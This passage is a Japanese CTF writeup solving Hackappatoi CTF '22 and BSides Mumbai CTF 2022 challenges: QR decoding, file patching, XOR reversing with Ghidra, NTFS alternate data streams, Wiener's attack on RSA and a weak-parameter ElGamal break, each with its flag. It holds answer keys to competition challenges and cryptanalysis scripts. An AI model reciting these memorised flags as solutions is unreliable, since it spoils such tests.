https://raw.githubusercontent.com/1vcian/90-45/main/90%2C45.txt

ここにアクセスすると、90*45,の後に0, 1が並んでいるテキストが書いてあった。

90*45,000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111100110000111100001111000000111111110011110000001111111111111100000000000000001100000000001100001111000000000011001111001100001111000011001100000000001100000000000000001100111111001100000011001100001111001100111100001111001100001100111111001100000000000000001100111111001100000000001100000011000011000000111100001100001100111111001100000000000000001100111111001100001100110000111111110000001111110000000000001100111111001100000000000000001100000000001100000011001100001111001100110000110000000011001100000000001100000000000000001111111111111100110011001100110011001100110011001100110011001111111111111100000000000000000000000000000000110011110011001111001111000000000011001111000000000000000000000000000000001111001111001100001111110011000011110011001100110000111100001100000000001100000000000000000000001111110000000000001111000011000011000011111100001100000011110000110000000000000000000000110000001111001100110011001111110000110011110011001111001100001111111100000000000000000000111111110011000000111111000000110011110011000000111100001100000011000000000000000000001100000000001100110000111111000000110000110000111100110000111111001100111100000000000000000000000011000011110000000011111111111111001111110011001100000000111111110000000000000000000011110011001111001100111111001100001111110011000011111111110000000000111100000000000000001100001100110011111100110000001100001111000000001100110011000011110011001100000000000000000011110000001111110000000000111111110011110011111111000000001111001111111100000000000000001111000000000011111100111111111111000011110000000000111100110011001100000000000000000000001100110000111111001100110000001100000011110000111100001100111111110000001100000000000000001111001111110011111100001100110000000011000011000011001100110000111100001100000000000000000011000011001100000011001111111100000011000011111100001111111100110000111100000000000000000000001100000000000000000000111111110011000000110011001100000011111111110000000000000000001100001100001111001111001100111111111100001100111100111100000011110011001100000000000000001100110000110011000000000000111100110011110011000000110000000011001111111100000000000000001111111111111100110011000011110000001100000000111111001100001100000000001100000000000000001100111111000000110011001100000011000011000011110011001111000000111100110000000000000000001111111100111100110000000000111111001111000000000000111100110000110000111100000000000000001100001100000011110011001111110000001100000000110000000011111111001111001100000000000000001100001111111100000011111100001111000011111111000011001111111111110011110000000000000000000000000000000000110000110000001100110011111100001100000011000000111111110000000000000000001111111111111100000011001111111111110011110000110000000011001100110000001100000000000000001100000000001100001100110011000000000011000011001111001111000000110000001100000000000000001100111111001100111111110011001100000000001100000011111111111111111100111100000000000000001100111111001100110011001111001111110011000000000011001100001100001100111100000000000000001100111111001100001111110011001111000000000011110000110000110011111111001100000000000000001100000000001100111111111111001100110011000000001100001100000011001111111100000000000000001111111111111100111100111111001111110011000011111100000011000011000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

90*45に並べると、1が黒、0が白のQRコードになるので、1セル1文字になるよう調整し、qr.txtに保存する。

#!/usr/bin/env python3
with open('90,45.txt', 'r') as f:
    data = f.read()

size = data.split(',')[0]
data = data.split(',')[1]
w = int(size.split('*')[0])
h = int(size.split('*')[1])

rows = []
for i in range(0, len(data), w):
    rows.append(data[i:i+w])

for row in rows[4:-5]:
    r = ''
    for i in range(8, len(row) - 8, 2):
        r += row[i]
    print(r)

$ cat qr.txt
1111111010011001100011110110001111111
1000001001100000101101001100101000001
1011101000101001101011001101001011101
1011101000001000100100011001001011101
1011101001010011110001110000001011101
1000001000101001101010010000101000001
1111111010101010101010101010101111111
0000000010110101101100000101100000000
1101101001110100110101010011001000001
0001110000001100100100111001000110010
0010001101010101110010110101101001111
0011110100011100010110100011001000100
1000001010011100010010011010011101011
0000100110000111111101110101000011110
0110101101011101001110100111110000011
1001010111010001001100001010100110101
0110001110000011110110111100001101111
1100000111011111100110000011010101000
1010011101010001000110011001011110001
1101110111001010000100100101010011001
0100101000101111000100111001111010011
0001000000000011110100010101000111110
1001001101101011111001011011000110101
1010010100000011010110100010000101111
1111111010100110001000011101001000001
1011100010101000100100110101100011010
1111011010000011101100000011010010011
1001000110101110001000010000111101101
1001111000111001100111100101111110110
0000000010010001010111001000100011110
1111111000101111110110010000101010001
1000001001010100000100101101100010001
1011101011110101000001000111111111011
1011101010101101110100000101001001011
1011101001110101100000110010010111101
1000001011111101010100001001000101111
1111111011011101110100111000100100001
$ python sqrd.py qr.txt
https://www.youtube.com/watch?v=dQw4w9WgXcQ?flag=HCTF{w0w_W3ll_doNe_8RuH_Y0u_G0t_17}

HCTF{w0w_W3ll_doNe_8RuH_Y0u_G0t_17}

Aperol Spritz (Misc)

バイナリエディタでjpgの高さ442を1000に変える。具体的にはファイルのオフセット0xb0-0xb1の部分を 01 ba から 03 e8 に変える。画像の下に新しく画像が現れ、フラグが書かれていた。

HCTF{Ap3Rol_is_for_k1Dz_c4Mpar1_i5_f0r_Ch4d5}

Sanity rev (Reverse)

$ strings sanityrev | grep hctf{
hctf{It_h4s_b33N_345Y}

hctf{It_h4s_b33N_345Y}

eXclusive club (Reverse)

Ghidraでデコンパイルする。

undefined8 main(void)

{
  int iVar1;
  undefined8 uVar2;
  size_t sVar3;
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("Welcome to our eXclusive club.\nType your password to join us.\n>");
  __isoc99_scanf(&DAT_00102048,local_28);
  uVar2 = obfuscation(local_28);
  sVar3 = strlen(local_28);
  iVar1 = check_access(uVar2,sVar3 & 0xffffffff);
  if (iVar1 == 0) {
    puts("You can\'t join us this time...");
  }
  else {
    puts("Access granted, bro!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

void * obfuscation(char *param_1)

{
  size_t sVar1;
  void *pvVar2;
  int local_28;
  
  sVar1 = strlen(param_1);
  pvVar2 = malloc(sVar1 << 2);
  local_28 = 0;
  while( true ) {
    sVar1 = strlen(param_1);
    if (sVar1 <= (ulong)(long)local_28) break;
    *(uint *)((long)pvVar2 + (long)local_28 * 4) = (int)param_1[local_28] ^ 0x41;
    local_28 = local_28 + 1;
  }
  return pvVar2;
}

int check_access(long param_1,int param_2)

{
  int iVar1;
  long in_FS_OFFSET;
  int local_7c;
  int local_78 [26];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  iVar1 = 0;
  local_78[0] = 0x29;
  local_78[1] = 0x22;
  local_78[2] = 0x35;
  local_78[3] = 0x27;
  local_78[4] = 0x3a;
  local_78[5] = 0x24;
  local_78[6] = 0x19;
  local_78[7] = 0x22;
  local_78[8] = 0x2d;
  local_78[9] = 0x14;
  local_78[10] = 0x74;
  local_78[11] = 0x70;
  local_78[12] = 0x37;
  local_78[13] = 0x72;
  local_78[14] = 0x1e;
  local_78[15] = 0x71;
  local_78[16] = 0x33;
  local_78[17] = 0x1f;
  local_78[18] = 0xf;
  local_78[19] = 0x71;
  local_78[20] = 0x35;
  local_78[21] = 0x7e;
  local_78[22] = 0x3c;
  if (param_2 == 0x17) {
    for (local_7c = 0; local_7c < 0x17; local_7c = local_7c + 1) {
      iVar1 = local_78[local_7c];
      if (*(int *)(param_1 + (long)local_7c * 4) != iVar1) {
        iVar1 = 0;
        break;
      }
      if (local_7c == 0x16) {
        iVar1 = 1;
        break;
      }
    }
  }
  else {
    iVar1 = 0;
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return iVar1;
}

0x41とのXORがlocal_78[i]と一致すればよい。

#!/usr/bin/env python3
enc = [0x29, 0x22, 0x35, 0x27, 0x3a, 0x24, 0x19, 0x22, 0x2d, 0x14, 0x74, 0x70,
    0x37, 0x72, 0x1e, 0x71, 0x33, 0x1f, 0xf, 0x71, 0x35, 0x7e, 0x3c]

flag = ''
for c in enc:
    flag += chr(c ^ 0x41)
print(flag)

hctf{eXclU51v3_0r^N0t?}

Hackappa_rev (Reverse)

Ghidraでデコンパイルする。
重要そうなコードは以下の部分。

int decrypt(EVP_PKEY_CTX *ctx,uchar *out,size_t *outlen,uchar *in,size_t inlen)

{
  undefined8 local_28;
  undefined8 local_20;
  undefined local_18;
  int local_c;
  
  local_28 = 0x627d367e4957464b;
  local_20 = 0x3655626e71787547;
  local_18 = 0x79;
  printf("%s",&local_28);
  for (local_c = 0; (local_c < 100 && (*(char *)((long)&local_28 + (long)local_c) != '\0'));
      local_c = local_c + 1) {
    *(char *)((long)&local_28 + (long)local_c) = *(char *)((long)&local_28 + (long)local_c) + -3;
  }
  printf("%s}\n",&local_28);
  return 0;
}

local_28以降の各バイトで-3すればよい。

#!/usr/bin/env python3
c0 = 0x627d367e4957464b
c1 = 0x3655626e71787547
c2 = 0x79

flag = ''
c0 = c0.to_bytes(8, 'little')
for c in c0:
    flag += chr(c - 3)
c1 = c1.to_bytes(8, 'little')
for c in c1:
    flag += chr(c - 3)
c2 = c2.to_bytes(1, 'little')
for c in c2:
    flag += chr(c - 3)
flag += '}'
print(flag)

HCTF{3z_Drunk_R3v}

Welcome To Web(ere) (Web)

HTMLソースを見ると、コメントにフラグの断片がある。

<!-- hctf{th3_good_0l_ -->

またリンクされている、main.cssを見ると、コメントに別のフラグの断片がある。

/* t1mes_wh3n_si7es*/

最後にリンクされている、main.jsを見ると、コメントに別のフラグの断片がある。

// _wer3_st4tic}

見つけたフラグの断片を結合すると、フラグになる。

hctf{th3_good_0l_t1mes_wh3n_si7es_wer3_st4tic}

Hidden cocktails (Forensic)

rarファイルを解凍すると、BooksやDocuments、imagesフォルダがあり、それぞれファイルが複数格納されている。rarファイルということで、代替データストリームが含まれていないか確認する。

D:\CTF\work>cd Stuff

D:\CTF\work\Stuff>dir /r
 ドライブ D のボリューム ラベルは DATA です
 ボリューム シリアル番号は CC27-65B0 です

 D:\CTF\work\Stuff のディレクトリ

2022/12/11  19:37    <DIR>          .
2022/12/11  19:37    <DIR>          ..
2022/11/08  22:33    <DIR>          Books
                                 40 Books:spritz_4_life.txt:$DATA
2022/11/08  20:20    <DIR>          Documents
2022/11/08  20:16    <DIR>          images
               0 個のファイル                   0 バイト
               5 個のディレクトリ  164,108,300,288 バイトの空き領域

D:\CTF\work\Stuff>more < Books:spritz_4_life.txt:$DATA
hctf{4lt3rn4t3_D4t4_Str34m_G0n3_W1ld}
hctf{4lt3rn4t3_D4t4_Str34m_G0n3_W1ld}

Hackappatoi CTF '22 Feedback form (SPECIAL)

アンケートに答えたら、フラグが表示された。

HCTF{Hackappatoi_l0v3s_y0u_4ll_<3}

BSides Mumbai CTF 2022 Writeup

CTF writeup

この大会は2022/12/10 20:00(JST)~2022/12/11 20:00(JST)に開催されました。
今回もチームで参戦。結果は1905点で251チーム中14位でした。
自分で解けた問題をWriteupとして書いておきます。

Welcome To BSides Mumbai CTF (Welcome)

問題にフラグが書いてあった。

BSMumbai{W3lcome_T0_BSides_Mumbai_CTF_2022}

Warmup (Reverse)

各インデックスでASCIIコードを比較している。
例えば、以下の場合、インデックス28で、55と比較している。

10:                                               ; preds = %0
  %11 = getelementptr inbounds [100 x i8], [100 x i8]* %2, i64 0, i64 28
  %12 = load i8, i8* %11, align 4
  %13 = sext i8 %12 to i32
  %14 = icmp eq i32 %13, 55
  br i1 %14, label %15, label %207

インデックスの位置に文字をセットして、順に並べればフラグになる。

>>> flag = [''] * 39
>>> flag[28] = chr(55)
>>> flag[30] = chr(110)
>>> flag[29] = chr(49)
>>> flag[36] = chr(53)
>>> flag[13] = chr(121)
>>> flag[18] = chr(95)
>>> flag[2] = chr(77)
>>> flag[15] = chr(51)
>>> flag[34] = chr(48)
>>> flag[7] = chr(48)
>>> flag[24] = chr(102)
>>> flag[17] = chr(102)
>>> flag[26] = chr(48)
>>> flag[25] = chr(49)
>>> flag[10] = chr(100)
>>> flag[27] = chr(52)
>>> flag[3] = chr(123)
>>> flag[23] = chr(95)
>>> flag[19] = chr(49)
>>> flag[21] = chr(95)
>>> flag[31] = chr(57)
>>> flag[8] = chr(117)
>>> flag[37] = chr(51)
>>> flag[11] = chr(95)
>>> flag[33] = chr(104)
>>> flag[1] = chr(83)
>>> flag[0] = chr(66)
>>> flag[22] = chr(52)
>>> flag[32] = chr(95)
>>> flag[16] = chr(49)
>>> flag[12] = chr(109)
>>> flag[38] = chr(125)
>>> flag[35] = chr(117)
>>> flag[6] = chr(102)
>>> flag[9] = chr(110)
>>> flag[14] = chr(53)
>>> flag[4] = chr(49)
>>> flag[5] = chr(95)
>>> flag[20] = chr(110)
>>> ''.join(flag)
'BSM{1_f0und_my531f_1n_4_f10471n9_h0u53}'
BSM{1_f0und_my531f_1n_4_f10471n9_h0u53}

Poet Xor (Crypto)

8バイトXOR鍵の暗号。フラグが"BSMumbai"で始まり、最終行に記載されていると推測できることから鍵を求め、復号する。

#!/usr/bin/env python3
from itertools import cycle

with open('flag.enc', 'rb') as f:
    cipher = f.read().splitlines()

flag_head = b'BSMumbai'

key = b''
last_line = bytes.fromhex(cipher[-1].decode())
for i in range(len(flag_head)):
    key += bytes([flag_head[i] ^ last_line[i]])

for h_ct in cipher:
    ct = bytes.fromhex(h_ct.decode())
    msg = bytes([a ^ b for a, b in zip(ct, cycle(key))]).decode()
    print(msg)

メッセージの復号結果は以下の通り。

Two bits meet, each with its own
One zero, one one, they are shown
Together they combine, with a XOR
A new value is formed, never a bore.
BSMumbai{w0w_1t_1s_4_fl4g_1n_th3_3nd}
BSMumbai{w0w_1t_1s_4_fl4g_1n_th3_3nd}

Big RSA (Crypto)

eが大きいので、Wiener's Attackで復号する。

#!/usr/bin/env sage
from Crypto.Util.number import *
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5

def wiener(e, n):
    m = 12345
    c = pow(m, e, n)
    q0 = 1

    list1 = continued_fraction(Integer(e)/Integer(n))
    conv = list1.convergents()
    for i in conv:
        k = i.numerator()
        q1 = i.denominator()

        for r in range(30):
            for s in range(30):
                d = r*q1 + s*q0
                m1 = pow(c, d, n)
                if m1 == m:
                    return d
        q0 = q1
    return None

with open('pubkey.pem', 'r') as f:
    pub_data = f.read()

with open('flag.enc', 'r') as f:
    enc = bytes.fromhex(f.read())

pubkey = RSA.importKey(pub_data)
n = pubkey.n
e = pubkey.e

d = int(wiener(e, n))
key = RSA.construct((n, e, d))
cipher_rsa = PKCS1_v1_5.new(key)

from Crypto.Random import get_random_bytes
sentinel = get_random_bytes(16)
FLAG = cipher_rsa.decrypt(enc, sentinel).rstrip().decode()
print(FLAG)

BSMumbai{RSA_with_bigE}

EggLamal (Crypto)

以下の式が与えられている。

g = 2
m = FLAG % p
A = pow(g, a, p)
B = pow(g, b, p)
s = pow(A, b, p)
c = s * m % p

ただし、p, A, B, c は既知、a, b は未知。B が p - 1 と同じ値になっているので、以下の式が成り立つ。

b = (p - 1) // 2

これでsの値が計算でき、それとcの値からmを計算し、フラグを求める。

#!/usr/bin/env python3
from Crypto.Util.number import *
with open('params.txt', 'r') as f:
    params = f.read().splitlines()

p = int(params[0].split(' ')[-1])
A = int(params[1].split(' ')[-1])
B = int(params[2].split(' ')[-1])
c = int(params[3].split(' ')[-1])
assert B == p - 1

g = 2
b = (p - 1) // 2
s = pow(A, b, p)
m = (c * inverse(s, p)) % p
FLAG = long_to_bytes(m).decode()
print(FLAG)

BSMumbai{ElGamal_Publickey_Cryptography}